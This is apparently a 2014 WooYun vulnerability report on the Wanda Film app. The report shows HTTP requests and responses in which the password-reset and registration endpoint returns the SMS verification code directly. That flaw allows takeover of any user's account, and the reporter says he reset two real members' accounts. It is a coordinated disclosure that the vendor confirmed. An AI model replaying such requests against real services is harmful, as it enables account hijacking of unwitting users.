当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054037

漏洞标题:APP终结者11#大连万达电影任意用户账户登录

相关厂商:大连万达集团股份有限公司

漏洞作者: zzR

提交时间:2014-03-19 17:12

修复时间:2014-05-03 17:12

公开时间:2014-05-03 17:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-19: 细节已通知厂商并且等待厂商处理中
2014-03-19: 厂商已经确认,细节仅向厂商公开
2014-03-29: 细节向核心白帽子及相关领域专家公开
2014-04-08: 细节向普通白帽子公开
2014-04-18: 细节向实习白帽子公开
2014-05-03: 细节向公众公开

简要描述:

春天来了,这是**的季节
/**/
万达的小伙伴说,你再去找个洞吧~~~~

详细说明:

APP名称:万达电影
对,就是万达电影!!!!!
其实是任意用户密码修改以及注册!!!!
在登陆页面找回密码填上需要找回的手机号,然后看他的请求

GET /filmserver/user/smsauthcode?type=2&mobile=13888888888&imei=&version=0 HTTP/1.1
Host: wdapi.wandafilm.com
Accept-Encoding: gzip
User-Agent: 万达电影 3.0.0 rv:43216 (iPhone; iPhone OS 7.1; zh_CN)
Connection: keep-alive
Proxy-Connection: keep-alive


响应

HTTP/1.1 200 OK
Date: Wed, 19 Mar 2014 08:58:06 GMT
Server: Apache
Keep-Alive: timeout=15, max=60
Connection: Keep-Alive
Content-Type: application/json;charset=UTF-8
Content-Length: 37
{"code":"374076","msg":"","status":0}


对!自然天成
填进code ,写上新密码

IMG_2225.PNG

漏洞证明:

重置了两个看似高端的账户账号
13333333333

IMG_2226.PNG


IMG_2227.PNG


13888888888

IMG_2229.PNG


IMG_2230.PNG


都是有积分的四星会员,不好说。

修复方案:

另外任意号码注册页也是有同样的问题

GET /filmserver/user/smsauthcode?type=1&mobile=1XXXXXX&imei=&version=0 HTTP/1.1
Host: wdapi.wandafilm.com
Accept-Encoding: gzip
User-Agent: 万达电影 3.0.0 rv:43216 (iPhone; iPhone OS 7.1; zh_CN)
Connection: keep-alive
Proxy-Connection: keep-alive


看响应

HTTP/1.1 200 OK
Date: Wed, 19 Mar 2014 08:46:38 GMT
Server: Apache
Keep-Alive: timeout=15, max=60
Connection: Keep-Alive
Content-Type: application/json;charset=UTF-8
Content-Length: 115
{"msg":"1小时内不重复生成手机验证码,手机1XXXX当前短信验证码为756600","status":19999}


还可以在页面显示哦

IMG_2224.PNG


就这样,支持暴力注册,粗暴重置密码登陆

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-19 18:18

厂商回复:

感谢zzR同学的关注与贡献!此漏洞目测存在,马上通知业务整改!

最新状态:

暂无